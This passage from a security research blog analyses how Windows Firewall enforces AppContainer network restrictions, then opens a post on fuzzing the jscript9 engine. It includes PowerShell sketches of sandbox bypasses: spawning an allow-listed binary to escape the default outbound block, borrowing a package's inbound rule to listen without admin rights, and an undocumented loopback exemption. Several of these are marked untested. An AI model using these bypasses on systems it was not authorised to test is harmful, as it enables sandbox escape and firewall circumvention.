        4 FWPM_CALLOUT_IPSEC_OUTBOUND_TRANSPORT_V6
        5 FWPM_CALLOUT_IPSEC_INBOUND_TUNNEL_V4
        6 FWPM_CALLOUT_IPSEC_INBOUND_TUNNEL_V6
...

The above output shows the callouts listed by their callout ID numbers. The ID number is key to finding the callback functions in the kernel. There doesn't seem to be a way of enumerating the addresses of callout functions directly (at least from user mode). This article shows a basic approach to extract the callback functions using a kernel debugger, although it's a little out of date.

The NETIO driver stores all registered callbacks in a large array, the index being the callout ID. If you want to find a specific callout then find the base of the array using the description in the article, then just calculate the offset based on a single callout structure and the index. For example on Windows 10 21H1 x64 the following command will dump a callout's classify callback function. Replace N with the callout ID; the magic numbers 198 and 50 are the offset into the gWfpGlobal global data table and the size of a callout entry, which you can discover through analyzing the code.

0: kd> ln poi(poi(poi(NETIO!gWfpGlobal)+198)+(50*N)+10)

If you're in kernel mode there's an undocumented KfdGetRefCallout function (and a corresponding KfdDeRefCallout to decrement the reference) exported by NETIO which will return a pointer to the internal callout structure based on the ID, avoiding the need to extract the offsets from disassembly.

AppContainer Network Restrictions

The basics of accessing the network from an AppContainer sandbox are documented by Microsoft. Specifically the lowbox token used for the sandbox needs to have one or more capabilities enabled to grant access to the network. The three capabilities are:

  • internetClient - Grants client access to the Internet
  • internetClientServer - Grants client and server access to the Internet
  • privateNetworkClientServer - Grants client and server access to local private networks.

Client Capabilities

Pretty much all Windows Store applications are granted the internetClient capability as accessing the Internet is a thing these days. Even the built-in calculator has this capability, presumably so you can fill in feedback on how awesome a calculator it is.

Image showing the list of capabilities granted to Windows calculator application showing the β€œYour Internet Connection” capability is granted.

However, this shouldn't grant the ability to act as a network server; for that you need the internetClientServer capability. Note that Windows defaults to blocking incoming connections, so just because you have the server capability still doesn't ensure you can receive network connections. The final capability is privateNetworkClientServer which grants access to private networks as both a client and a server. What is the internet and what is private isn't made immediately clear; hopefully we'll find out from inspecting the firewall configuration.

PS> $token = Get-NtToken -LowBox -PackageSid TEST
PS> $addr = Resolve-DnsName "www.google.com" -Type A
PS> $sock = Invoke-NtToken $token {
>>   [System.Net.Sockets.TcpClient]::new($addr.IPAddress, 80)
>> }
Exception calling ".ctor" with "2" argument(s): "An attempt was made to access a socket in a way forbidden by its access permissions 216.58.194.164:80"
PS> $template = New-FwNetEventTemplate
PS> Add-FwCondition $template -IPAddress $addr.IPAddress -Port 80
PS> Add-FwCondition $template -NetEventType ClassifyDrop
PS> Get-FwNetEvent -Template $template | Format-List

FilterId     : 71079
LayerId      : 48
ReauthReason : 0
...

PS> Get-FwFilter -Id 71079 | Format-FwFilter
Name       : Block Outbound Default Rule
Action Type: Block
Key        : fb8f5cab-1a15-4616-b63f-4a0d89e527f8
Id         : 71079
Description: Block Outbound Default Rule
Layer      : FWPM_LAYER_ALE_AUTH_CONNECT_V4
Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_WSH
Flags      : None
Weight     : 274877906944
Conditions :
FieldKeyName                  MatchType Value
------------                  --------- -----
FWPM_CONDITION_ALE_PACKAGE_ID NotEqual  NULL SID

In the above output we first create a lowbox token for testing the AppContainer access. In this example we don't provide any capabilities for the token, so we expect the network connection to fail. Next we connect a TcpClient socket while impersonating the lowbox token, and the connection is immediately blocked with an error.

We then get the network event corresponding to the connection request to see what filter blocked the connection. Formatting the filter from the network event we find the "Block Outbound Default Rule". Based on the FWPM_CONDITION_ALE_PACKAGE_ID condition, this will block any AppContainer network connection which hasn't been permitted by higher priority firewall filters.

Like with the "Default Outbound" filter we saw earlier, this is a backstop if nothing else matches. Unlike that earlier filter the default is to block rather than permit the connection. Another thing to note is the sublayer name. For "Block Outbound Default Rule" it's MICROSOFT_DEFENDER_SUBLAYER_WSH which is used for built-in filters which aren't directly visible from the Defender firewall configuration. Whereas MICROSOFT_DEFENDER_SUBLAYER_FIREWALL is used for "Default Outbound", which is a lower priority sublayer (based on its weight) and thus would never be evaluated due to the higher priority block.

Okay, we know how connections are blocked. Therefore there must be a higher priority filter within the MICROSOFT_DEFENDER_SUBLAYER_WSH sublayer which permits the connection. We could go back to manual inspection, but we might as well just see what the network event shows as the matching filter when we grant the internetClient capability.

PS> $cap = Get-NtSid -KnownSid CapabilityInternetClient
PS> $token = Get-NtToken -LowBox -PackageSid TEST -CapabilitySid $cap
PS> Set-FwEngineOption -NetEventMatchAnyKeywords ClassifyAllow
PS> $sock = Invoke-NtToken $token {
>>   [System.Net.Sockets.TcpClient]::new($addr.IPAddress, 80)
>> }
PS> Set-FwEngineOption -NetEventMatchAnyKeywords None
PS> $template = New-FwNetEventTemplate
PS> Add-FwCondition $template -IPAddress $addr.IPAddress -Port 80
PS> Add-FwCondition $template -NetEventType ClassifyAllow
PS> Get-FwNetEvent -Template $template | Format-List
FilterId     : 71075
LayerId      : 48
ReauthReason : 0
...

PS> Get-FwFilter -Id 71075 | Format-FwFilter
Name       : InternetClient Default Rule
Action Type: Permit
Key        : 406568a7-a949-410d-adbb-2642ec3e8653
Id         : 71075
Description: InternetClient Default Rule
Layer      : FWPM_LAYER_ALE_AUTH_CONNECT_V4
Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_WSH
Flags      : None
Weight     : 412316868544
Conditions :
FieldKeyName                       MatchType Value
------------                       --------- -----
FWPM_CONDITION_ALE_PACKAGE_ID      NotEqual  NULL SID
FWPM_CONDITION_IP_REMOTE_ADDRESS   Range
Low: 0.0.0.0 High: 255.255.255.255
FWPM_CONDITION_ORIGINAL_PROFILE_ID Equal     Public
FWPM_CONDITION_CURRENT_PROFILE_ID  Equal     Public
FWPM_CONDITION_ALE_USER_ID         Equal
O:LSD:(A;;CC;;;S-1-15-3-1)(A;;CC;;;WD)(A;;CC;;;AN)

In this example we create a new token using the same package SID but with the internetClient capability. When we connect the socket we no longer get an error and the connection is permitted. Checking for the ClassifyAllow event we find the "InternetClient Default Rule" filter matched the connection.

Looking at the conditions we can see that it will only match if the socket creator is in an AppContainer, based on the FWPM_CONDITION_ALE_PACKAGE_ID condition. The FWPM_CONDITION_ALE_USER_ID condition also ensures that it will only match if the creator has the internetClient capability, which is S-1-15-3-1 in SDDL format. This filter is what's granting access to the network.
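
You can double check what S-1-15-3-1 maps to by resolving the SDDL string back to a SID object, assuming Get-NtSid accepts an SDDL string via -Sddl as I use here; it should come out as the internet client capability:

PS> # Should resolve to the internetClient capability name.
PS> Get-NtSid -Sddl "S-1-15-3-1"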

One odd thing is the FWPM_CONDITION_IP_REMOTE_ADDRESS condition. It seems to match on all possible IPv4 addresses. Shouldn't this exclude network addresses on our local "private" network? At the very least you'd assume it would block the reserved IP address ranges from RFC 1918? The key to understanding this is the profile ID conditions, which are both set to Public. The computer I'm running these commands on has a single network interface configured with the public profile, as shown:

Image showing the option of either Public or Private network profiles.

Therefore the firewall is configured to treat all network addresses in the same context, granting the internetClient capability access to any address, including your local "private" network. This might be unexpected. In fact, if you enumerate all the filters on the machine, you won't find any that matches the privateNetworkClientServer capability, and using that capability will not grant access to any network resource.

If you switch the network profile to Private, you'll find there are now three "InternetClient Default Rule" filters (note that on Windows 11 there will only be one, as it uses the OR'ing feature of conditions mentioned earlier to merge the three rules together).

Name       : InternetClient Default Rule
Action Type: Permit
...
Conditions :
FieldKeyName                       MatchType Value
------------                       --------- -----
FWPM_CONDITION_ALE_PACKAGE_ID      NotEqual  NULL SID
FWPM_CONDITION_IP_REMOTE_ADDRESS   Range
Low: 0.0.0.0 High: 10.0.0.0
FWPM_CONDITION_ORIGINAL_PROFILE_ID Equal     Private
FWPM_CONDITION_CURRENT_PROFILE_ID  Equal     Private
...

Name       : InternetClient Default Rule
Action Type: Permit
...
Conditions :
FieldKeyName                       MatchType Value
------------                       --------- -----
FWPM_CONDITION_ALE_PACKAGE_ID      NotEqual  NULL SID
FWPM_CONDITION_IP_REMOTE_ADDRESS   Range
Low: 239.255.255.255 High: 255.255.255.255
...

Name       : InternetClient Default Rule
Action Type: Permit
...
Conditions :
FieldKeyName                       MatchType Value
------------                       --------- -----
FWPM_CONDITION_ALE_PACKAGE_ID      NotEqual  NULL SID
FWPM_CONDITION_IP_REMOTE_ADDRESS   Range
Low: 10.255.255.255 High: 224.0.0.0
...

As you can see in the first filter, it covers addresses 0.0.0.0 to 10.0.0.0; the machine's private network is 10.0.0.0/8, and the profile IDs are now set to Private. The other two filters cover the rest of the address space, together excluding the 10.0.0.0/8 network as well as the multicast group addresses from 224.0.0.0 to 240.0.0.0.

The profile ID conditions are important here if you have more than one network interface. For example, if you have two, one Public and one Private, you would get a filter for the Public network covering the entire IP address range and the three Private ones excluding the private network addresses. The Public filter won't match if the network traffic is being sent from the Private network interface, preventing an application without the right capability from accessing the private network.
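
You can quickly check which profile each of your interfaces is currently assigned using the built-in NetConnectionProfile cmdlets:

PS> Get-NetConnectionProfile | Select-Object InterfaceAlias, NetworkCategory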

Speaking of which, we can also now identify the filters which match the private network capability. There are two, covering the private network range and the multicast range; we'll just show one of them.

Name       : PrivateNetwork Outbound Default Rule
Action Type: Permit
Key        : e0194c63-c9e4-42a5-bbd4-06d90532d5e6
Id         : 71640
Description: PrivateNetwork Outbound Default Rule
Layer      : FWPM_LAYER_ALE_AUTH_CONNECT_V4
Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_WSH
Flags      : None
Weight     : 36029209335832512
Conditions :
FieldKeyName                       MatchType Value
------------                       --------- -----
FWPM_CONDITION_ALE_PACKAGE_ID      NotEqual  NULL SID
FWPM_CONDITION_IP_REMOTE_ADDRESS   Range
Low: 10.0.0.0 High: 10.255.255.255
FWPM_CONDITION_ORIGINAL_PROFILE_ID Equal     Private
FWPM_CONDITION_CURRENT_PROFILE_ID  Equal     Private
FWPM_CONDITION_ALE_USER_ID         Equal
O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)

We can see in the FWPM_CONDITION_ALE_USER_ID condition that the connection would be permitted if the creator has the privateNetworkClientServer capability, which is S-1-15-3-3 in SDDL.

It is slightly ironic that the Public network profile is probably the recommended choice even when you're on your own private network (Windows 11 even makes the recommendation explicit, as shown below), in that it should reduce the attack surface the device exposes to others on the network. However, if an AppContainer application with the internetClient capability is compromised, the Public profile opens up your private network to access which the Private profile wouldn't grant.

Image showing the option of either Public or Private network profiles. This is from Windows 11 where Public is marked as recommended.

Aside: one thing you might wonder is, if your network interface is marked as Private and the AppContainer application only has the internetClient capability, what happens if your DNS server is your local router at 10.0.0.1? Wouldn't the application be blocked from making DNS requests? Windows has a DNS client service which is typically always running. This service is what usually makes DNS requests on behalf of applications, as it allows the results to be cached. The RPC server which the service exposes allows callers which have any of the three network capabilities to connect to it and make DNS requests, avoiding the problem. Of course, if the service is disabled, in-process DNS lookups will be used instead, which could result in weird name resolution issues depending on your network configuration.
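
As a quick way of observing this, you could try a name lookup while impersonating a capability-less lowbox token; assuming the DNS client service is running, the lookup should still succeed even though direct socket access is blocked (an untested sketch):

PS> $token = Get-NtToken -LowBox -PackageSid TEST
PS> Invoke-NtToken $token {
>>   # Goes via the DNS client service rather than a direct socket.
>>   Resolve-DnsName "www.google.com" -Type A
>> }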

We can now understand how issue 2207, which I reported to Microsoft, bypasses the capability requirements. If the MICROSOFT_DEFENDER_SUBLAYER_WSH sublayer contains Permit filters for an outbound connection which are evaluated before the "Block Outbound Default Rule" filter, then it might be possible to avoid needing capabilities at all.

PS> Get-FwFilter -AleLayer ConnectV4 -Sorted |
Where-Object SubLayerKeyName -eq MICROSOFT_DEFENDER_SUBLAYER_WSH |
Select-Object ActionType, Name
...
Permit     Allow outbound TCP traffic from dmcertinst.exe
Permit     Allow outbound TCP traffic from omadmclient.exe
Permit     Allow outbound TCP traffic from deviceenroller.exe
Permit     InternetClient Default Rule
Permit     InternetClientServer Outbound Default Rule
Block      Block all outbound traffic from SearchFilterHost
Block      Block outbound traffic from dmcertinst.exe
Block      Block outbound traffic from omadmclient.exe
Block      Block outbound traffic from deviceenroller.exe
Block      Block Outbound Default Rule
Block      WSH Default Outbound Block

PS> Get-FwFilter -Id 72753 | Format-FwFilter
Name       : Allow outbound TCP traffic from dmcertinst.exe
Action Type: Permit
Key        : 5237f74f-6346-4038-a48d-4b779f862e65
Id         : 72753
Description:
Layer      : FWPM_LAYER_ALE_AUTH_CONNECT_V4
Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_WSH
Flags      : Indexed
Weight     : 422487342972928
Conditions :
FieldKeyName               MatchType Value
------------               --------- -----
FWPM_CONDITION_ALE_APP_ID  Equal
\device\harddiskvolume3\windows\system32\dmcertinst.exe
FWPM_CONDITION_IP_PROTOCOL Equal     Tcp

As we can see in the output there are quite a few Permit filters before the "Block Outbound Default Rule" filter (and I've also cropped the list to make it smaller). If we inspect the "Allow outbound TCP traffic from dmcertinst.exe" filter, we find that it only matches on the App ID and the IP protocol. As it doesn't have any AppContainer-specific checks, any socket created in the context of a dmcertinst process is permitted to make TCP connections.

Once the "Allow outbound TCP traffic from dmcertinst.exe" filter matches, the sublayer evaluation is terminated and it never reaches the "Block Outbound Default Rule" filter. This is fairly trivial to exploit, as long as the AppContainer process is allowed to spawn new processes, which is the case by default.
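
A minimal sketch of the first step, assuming New-Win32Process accepts the lowbox token via a -Token parameter: spawn the allow-listed binary inside the AppContainer, after which any TCP socket created in that process matches the Permit filter rather than the default block. Actually coercing dmcertinst.exe into making a useful connection for you is left out here.

PS> $token = Get-NtToken -LowBox -PackageSid TEST
PS> # Hypothetical: run the allow-listed binary under the lowbox token.
PS> New-Win32Process -CommandLine "dmcertinst.exe" -Token $token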

Server Capabilities

What about the internetClientServer capability; how does that function? First, there's a second set of outbound filters covering the capability, with the same network addresses as the base internetClient capability. The only difference is the FWPM_CONDITION_ALE_USER_ID condition checks for the internetClientServer capability (S-1-15-3-2) instead. For inbound connections, the FWPM_LAYER_ALE_AUTH_RECV_ACCEPT_V4 layer contains the filter.

PS> Get-FwFilter -AleLayer RecvAcceptV4 -Sorted |
Where-Object Name -Match InternetClientServer |
Format-FwFilter
Name       : InternetClientServer Inbound Default Rule
Action Type: Permit
Key        : 45c5f1d5-6ad2-4a2a-a605-4cab7d4fb257
Id         : 72470
Description: InternetClientServer Inbound Default Rule
Layer      : FWPM_LAYER_ALE_AUTH_RECV_ACCEPT_V4
Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_WSH
Flags      : None
Weight     : 824633728960
Conditions :
FieldKeyName                       MatchType Value
------------                       --------- -----
FWPM_CONDITION_ALE_PACKAGE_ID      NotEqual  NULL SID
FWPM_CONDITION_IP_REMOTE_ADDRESS   Range
Low: 0.0.0.0 High: 255.255.255.255
FWPM_CONDITION_ORIGINAL_PROFILE_ID Equal     Public
FWPM_CONDITION_CURRENT_PROFILE_ID  Equal     Public
FWPM_CONDITION_ALE_USER_ID         Equal
O:LSD:(A;;CC;;;S-1-15-3-2)(A;;CC;;;WD)(A;;CC;;;AN)

The example shows the filter for a Public network interface, granting an AppContainer application the ability to receive network connections. However, this will only be permitted if the socket creator has the internetClientServer capability. Note that there would be similar rules for the private network if the network interface is marked as Private, but granting access only with the privateNetworkClientServer capability.

As mentioned earlier, just because an application has one of these capabilities doesn't mean it can receive network connections; the default configuration will still block the inbound connection. However, when a UWP application which requires one of the two server capabilities is installed, the AppX installer service registers the AppContainer profile with the Windows Defender Firewall service. This adds a filter to permit the AppContainer package to receive inbound connections. For example, the following is for the Microsoft Photos application, which is typically installed by default:

PS> Get-FwFilter -Id 68299 |
Format-FwFilter -FormatSecurityDescriptor -Summary
Name       : @{Microsoft.Windows.Photos_2021...
Action Type: Permit
Key        : 7b51c091-ed5f-42c7-a2b2-ce70d777cdea
Id         : 68299
Description: @{Microsoft.Windows.Photos_2021...
Layer      : FWPM_LAYER_ALE_AUTH_RECV_ACCEPT_V4
Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_FIREWALL
Flags      : Indexed
Weight     : 10376294366095343616
Conditions :
FieldKeyName                  MatchType Value
------------                  --------- -----
FWPM_CONDITION_ALE_PACKAGE_ID Equal
microsoft.windows.photos_8wekyb3d8bbwe
FWPM_CONDITION_ALE_USER_ID    Equal     O:SYG:SYD:(A;;CCRC;;;S-1-5-21-3563698930-1433966124...
<Owner> (Defaulted) : NT AUTHORITY\SYSTEM
<Group> (Defaulted) : NT AUTHORITY\SYSTEM
<DACL>
DOMAIN\alice: (Allowed)(None)(Full Access)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:...
APPLICATION PACKAGE AUTHORITY\Your Internet connection:...
APPLICATION PACKAGE AUTHORITY\Your Internet connection,...
APPLICATION PACKAGE AUTHORITY\Your home or work networks:...
NAMED CAPABILITIES\Proximity: (Allowed)(None)(Full Access)

The filter only checks that the package SID matches and that the socket creator is a specific user in an AppContainer. Note that this rule doesn't check the executable file, remote IP address, port, or profile ID. Once an installed AppContainer application is granted a server capability, it can act as a server through the firewall for any traffic type or port.

A normal application could abuse this configuration to run a network service without needing the administrator access normally required to grant an executable access through the firewall. All you'd need to do is create an arbitrary AppContainer process in the permitted package and grant it the internetClientServer and/or privateNetworkClientServer capabilities. If there isn't an application installed which has the appropriate firewall rules, a non-administrator user can install any signed application with the appropriate capabilities to add them. While this clearly circumvents the expected administrator requirements for new listening processes, it's presumably by design.
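
A sketch of what that abuse might look like, reusing the Photos package from above (the KnownSid name and the port are my assumptions; the permit filter doesn't restrict the port anyway):

PS> $cap = Get-NtSid -KnownSid CapabilityInternetClientServer
PS> $token = Get-NtToken -LowBox -PackageSid "microsoft.windows.photos_8wekyb3d8bbwe" -CapabilitySid $cap
PS> $listener = Invoke-NtToken $token {
>>   # Hypothetical port for illustration.
>>   $l = [System.Net.Sockets.TcpListener]::new([System.Net.IPAddress]::Any, 8080)
>>   $l.Start()
>>   $l
>> }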

Localhost Access

One of the specific restrictions imposed on AppContainer applications is blocking access to localhost. The purpose of this is to make it more difficult to exploit local network services which might not correctly handle AppContainer callers, which could otherwise result in a sandbox escape. Let's test the behavior out and try to connect to a localhost service.

PS> $token = Get-NtToken -LowBox -PackageSid "LOOPBACK"
PS> Invoke-NtToken $token {
    [System.Net.Sockets.TcpClient]::new("127.0.0.1", 445)
}
Exception calling ".ctor" with "2" argument(s): "A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond 127.0.0.1:445"

If you compare the error to when we tried to connect to an internet address without the appropriate capability, you'll notice it's different. When we connected to the internet we got an immediate error indicating that access isn't permitted. For localhost we instead get a timeout error, preceded by a multi-second delay. Why the difference? Getting the network event which corresponds to the connection and displaying the blocking filter shows something interesting.

PS> Get-FwFilter -Id 69039 |
Format-FwFilter -FormatSecurityDescriptor -Summary
Name       : AppContainerLoopback
Action Type: Block
Key        : a58394b7-379c-43ac-aa07-9b620559955e
Id         : 69039
Description: AppContainerLoopback
Layer      : FWPM_LAYER_ALE_AUTH_RECV_ACCEPT_V4
Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_WSH
Flags      : None
Weight     : 18446744073709551614
Conditions :
FieldKeyName               MatchType   Value
------------               ---------   -----
FWPM_CONDITION_FLAGS       FlagsAllSet IsLoopback
FWPM_CONDITION_ALE_USER_ID Equal
O:LSD:(A;;CC;;;AC)(A;;CC;;;S-1-15-3-1)(A;;CC;;;S-1-15-3-2)...
<Owner> : NT AUTHORITY\LOCAL SERVICE
<DACL>
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES...
APPLICATION PACKAGE AUTHORITY\Your Internet connection...
APPLICATION PACKAGE AUTHORITY\Your Internet connection, including...
APPLICATION PACKAGE AUTHORITY\Your home or work networks...
NAMED CAPABILITIES\Proximity: (Allowed)(None)(Match)
Everyone: (Allowed)(None)(Match)
NT AUTHORITY\ANONYMOUS LOGON: (Allowed)(None)(Match)

The blocking filter is not in the connect layer as you might expect; instead it's in the receive/accept layer. This explains why we get a timeout rather than an immediate failure: the "inbound" connection request is being dropped as per the default configuration. This means the TCP client waits for a response from the server until it eventually hits the timeout limit.

The second interesting thing to note about the filter is that it's not based on an IP address such as 127.0.0.1. Instead it uses a condition which checks for the IsLoopback condition flag (FWP_CONDITION_FLAG_IS_LOOPBACK in the SDK). This flag indicates that the connection is being made through the built-in loopback network, regardless of the destination address. Even if you access the public IP addresses for the local network interfaces, the packets will still be routed through the loopback network and the condition flag will be set.

The user ID check is odd, in that the security descriptor matches both AppContainer and non-AppContainer processes. This is of course the point; if it didn't match both then it wouldn't block the connection. However, it's not immediately clear what its actual purpose is if it just matches everything. In my opinion, it adds a risk that the filter will be ignored if the socket creator has disabled the Everyone group. This condition was modified relative to Windows 8 to support LPAC, so it's presumably intentional.

You might ask, if the filter would block any loopback connection regardless of whether it's in an AppContainer, how do loopback connections work for normal applications? Wouldn't this filter always match and block the connection? Unsurprisingly there are some additional permit filters before the blocking filter, as shown below.

PS> Get-FwFilter -AleLayer RecvAcceptV4 -Sorted |
Where-Object Name -Match AppContainerLoopback | Format-FwFilter
Name       : AppContainerLoopback
Action Type: Permit
...
Conditions :
FieldKeyName         MatchType   Value
------------         ---------   -----
FWPM_CONDITION_FLAGS FlagsAllSet IsAppContainerLoopback

Name       : AppContainerLoopback
Action Type: Permit
...
Conditions :
FieldKeyName         MatchType   Value
------------         ---------   -----
FWPM_CONDITION_FLAGS FlagsAllSet IsReserved

Name       : AppContainerLoopback
Action Type: Permit
...
Conditions :
FieldKeyName         MatchType   Value
------------         ---------   -----
FWPM_CONDITION_FLAGS FlagsAllSet IsNonAppContainerLoopback

The three filters shown above only check for different condition flags, and you can find documentation for the flags on MSDN. Starting at the bottom we have a check for IsNonAppContainerLoopback. This flag is set on a connection when the loopback connection is between non-AppContainer created sockets. This filter is what grants normal applications loopback access. It's also why an application can listen on localhost even if it's not granted access to receive connections from the network in the firewall configuration.

In contrast, the first filter checks for the IsAppContainerLoopback flag. Based on the documentation and the name, you might assume this would allow any AppContainer to use loopback to any other. However, based on testing, this flag is only set if the two AppContainers have the same package SID. This is presumably to allow an AppContainer to communicate with itself or other processes within its package through loopback sockets.
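
A quick sketch to test that behavior: create a listener and a client under tokens with the same package SID, and the loopback connection should be permitted (untested here; the port is arbitrary):

PS> $token = Get-NtToken -LowBox -PackageSid "TEST"
PS> $listener = Invoke-NtToken $token {
>>   # Arbitrary port; both sockets share the TEST package SID.
>>   $l = [System.Net.Sockets.TcpListener]::new([System.Net.IPAddress]::Loopback, 12345)
>>   $l.Start()
>>   $l
>> }
PS> $client = Invoke-NtToken $token {
>>   [System.Net.Sockets.TcpClient]::new("127.0.0.1", 12345)
>> }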

This flag is also, I suspect, the reason that connecting to a loopback socket is handled in the receive layer rather than the connect layer. Perhaps WFP can't easily tell ahead of time whether both the connecting and receiving sockets will be in the same AppContainer package, so it delays resolving that until the connection has been received. This does lead to the unfortunate behavior that blocked loopback sockets timeout rather than fail immediately.

The final flag, IsReserved, is more curious. MSDN of course says this is "Reserved for future use", and the future is now. Though checking back at the filters in Windows 8.1 also shows it being used, so if it was reserved, it wasn't for very long. The obvious conclusion is that this is really a "Microsoft reserved" flag; by that I mean it's actually used, but Microsoft is as yet unwilling to publicly document it.

What is it used for? AppContainers are supposed to be a capability-based system, where you can just add new capabilities to grant additional privileges. It would make sense to have a loopback capability to grant access, which could be restricted to only being used for debugging purposes. However, it seems that loopback access was so beyond the pale for the designers that instead you can only grant access for debug purposes through an administrator-only API. Perhaps it's related?

PS> Add-AppModelLoopbackException -PackageSid "LOOPBACK"
PS> Get-FwFilter -AleLayer ConnectV4 |
Where-Object Name -Match AppContainerLoopback |
Format-FwFilter -FormatSecurityDescriptor -Summary
Name       : AppContainerLoopback
Action Type: CalloutInspection
Key        : dfe34c0f-84ca-4af1-9d96-8bf1e8dac8c0
Id         : 54912247
Description: AppContainerLoopback
Layer      : FWPM_LAYER_ALE_AUTH_CONNECT_V4
Sub Layer  : MICROSOFT_DEFENDER_SUBLAYER_WSH
Flags      : None
Weight     : 18446744073709551615
Callout Key: FWPM_CALLOUT_RESERVED_AUTH_CONNECT_LAYER_V4
Conditions :
FieldKeyName               MatchType Value
------------               --------- -----
FWPM_CONDITION_ALE_USER_ID Equal     D:(A;NP;CC;;;WD)(A;NP;CC;;;AN)(A;NP;CC;;;S-1-15-3-1861862962-...
<DACL>
Everyone: (Allowed)(NoPropagateInherit)(Match)
NT AUTHORITY\ANONYMOUS LOGON: (Allowed)(NoPropagateInherit)(Match)
PACKAGE CAPABILITY\LOOPBACK: (Allowed)(NoPropagateInherit)(Match)
LOOPBACK: (Allowed)(NoPropagateInherit)(Match)

First we add a loopback exemption for the LOOPBACK package name. We then look for the AppContainerLoopback filters in the connect layer; the one we're interested in is shown. The first thing to note is that the action type is set to CalloutInspection. This might seem slightly surprising; you'd expect it to do something more than inspect the traffic.

The name of the callout, FWPM_CALLOUT_RESERVED_AUTH_CONNECT_LAYER_V4, gives the game away. The fact that it has RESERVED in the name can't be a coincidence. This callout is implemented internally by Windows in the TCPIP!WfpAlepDbgLowboxSetByPolicyLoopbackCalloutClassify function. That name loses all mystery and pretty much explains its purpose, which is to configure the connection so that the IsReserved flag is set when the receive layer processes it.

The user ID here is equally important. When you register the loopback exemption you only specify the package SID, which is shown in the output as the last "LOOPBACK" line. Therefore you'd assume you'd need to always run your code within that package. However, the penultimate line is "PACKAGE CAPABILITY\LOOPBACK", which is my module's way of telling you that this is the package SID, but converted to a capability SID. This is basically changing the first relative identifier in the SID from 2 to 3.
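
You can see the conversion for yourself by comparing the two forms; the output should differ only in that first relative identifier (2 for the package SID, 3 for the capability form):

PS> Get-NtSid -PackageSid "LOOPBACK"
PS> Get-NtSid -PackageSid "LOOPBACK" -AsCapability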

We can use this behavior to simulate a generic loopback exemption capability. It allows you to create an AppContainer sandboxed process which has access to localhost and which isn't restricted to a particular package. This would be useful for applications such as Chrome to implement a network-facing sandboxed process, and it works from Windows 8 through 11. Unfortunately it's not officially documented, so it can't be relied upon. An example demonstrating the use of the capability is shown below.

PS> $cap = Get-NtSid -PackageSid "LOOPBACK" -AsCapability
PS> $token = Get-NtToken -LowBox -PackageSid "TEST" -cap $cap
PS> $sock = Invoke-NtToken $token {
    [System.Net.Sockets.TcpClient]::new("127.0.0.1", 445)
}
PS> $sock.Client.RemoteEndPoint
AddressFamily Address   Port
------------- -------   ----
 InterNetwork 127.0.0.1  445

Conclusions

That wraps up my quick overview of how AppContainer network restrictions are implemented using the Windows Firewall. I covered the basics of the Windows Firewall as well as some of the tooling I wrote to analyze its configuration. This background allowed me to explain why the issue I reported to Microsoft worked. I also pointed out some of the quirks of the implementation which you might find of interest.

Having a good understanding of how a security feature works is an important step towards finding security issues. I hope that by providing both the background and the tooling, other researchers can also find similar issues and try to get them fixed.

Fuzzing Closed-Source JavaScript Engines with Coverage Feedback

By: Ryan
14 September 2021 at 17:14

Posted by Ivan Fratric, Project Zero

tl;dr I combined Fuzzilli (an open-source JavaScript engine fuzzer) with TinyInst (an open-source dynamic instrumentation library for fuzzing). I also added grammar-based mutation support to Jackalope (my black-box binary fuzzer). So far, these two approaches have resulted in finding three security issues in jscript9.dll (the default JavaScript engine used by Internet Explorer).

Introduction or “when you can’t beat them, join them”

In the past, I’ve invested a lot of time in generation-based fuzzing, which was a successful way to find vulnerabilities in various targets, especially those that take some form of language as input. For example, Domato, my grammar-based generational fuzzer, found over 40 vulnerabilities in WebKit and numerous bugs in Jscript.

While generation-based fuzzing is still a good way to fuzz many complex targets, it has been demonstrated that, for finding vulnerabilities in modern JavaScript engines, especially engines with JIT compilers, better results can be achieved with mutational, coverage-guided approaches. My colleague Samuel Groß makes a compelling case for why that is in his OffensiveCon talk. Samuel is also the author of Fuzzilli, an open-source JavaScript engine fuzzer based on mutating a custom intermediate language. Fuzzilli has found a large number of bugs in various JavaScript engines.

While there has been a lot of development on coverage-guided fuzzers over the last few years, most of the public tooling focuses on open-source targets or software running on the Linux operating system. Meanwhile, I focused on developing tooling for fuzzing closed-source binaries on operating systems where such software is more prevalent (currently Windows and macOS). Some years back, I published WinAFL, the first performant AFL-based fuzzer for Windows. About a year and a half ago, however, I started working on a brand new toolset for black-box coverage-guided fuzzing. TinyInst and Jackalope are the two outcomes of this effort.

It comes somewhat naturally to combine the tooling I’ve been working on with techniques that have been so successful in finding JavaScript bugs, and try to use the resulting tooling to fuzz JavaScript engines for which the source code is not available. Of such engines, I know two: jscript and jscript9 (implemented in jscript.dll and jscript9.dll) on Windows, which are both used by the Internet Explorer web browser. Of these two, jscript9 is probably more interesting in the context of mutational coverage-guided fuzzing since it includes a JIT compiler and more advanced engine features.

While you might think that Internet Explorer is a thing of the past and it doesn’t make sense to spend energy looking for bugs in it, the fact remains that Internet Explorer is still heavily exploited by real-world attackers. In 2020 there were two Internet Explorer 0days exploited in the wild and three in 2021 so far. One of these vulnerabilities was in the JIT compiler of jscript9. I’ve personally vowed several times that I’m done looking into Internet Explorer, but each time, more 0days in the wild pop up and I change my mind.

Additionally, the techniques described here could be applied to any closed-source or even open-source software, not just Internet Explorer. In particular, grammar-based mutational fuzzing described two sections down can be applied to targets other than JavaScript engines by simply changing the input grammar.

Approach 1: Fuzzilli + TinyInst

Fuzzilli, as noted above, is a state-of-the-art JavaScript engine fuzzer, and TinyInst is a dynamic instrumentation library. Although TinyInst is general-purpose and could be used in other applications, it comes with various features useful for fuzzing, such as out-of-the-box support for persistent fuzzing, various types of coverage instrumentation etc. TinyInst is meant to be simple to integrate with other software, in particular fuzzers, and has already been integrated with some.

So, integrating with Fuzzilli was meant to be simple. However, there were still various challenges to overcome for different reasons:

Challenge 1: Getting Fuzzilli to build on Windows where our targets are.

Edit 2021-09-20: The version of Swift for Windows used in this project was from January 2021, when I first started working on it. Since version 5.4, Swift Package Manager is supported on Windows, so building Swift code should be much easier now. Additionally, static linking is supported for C/C++ code.

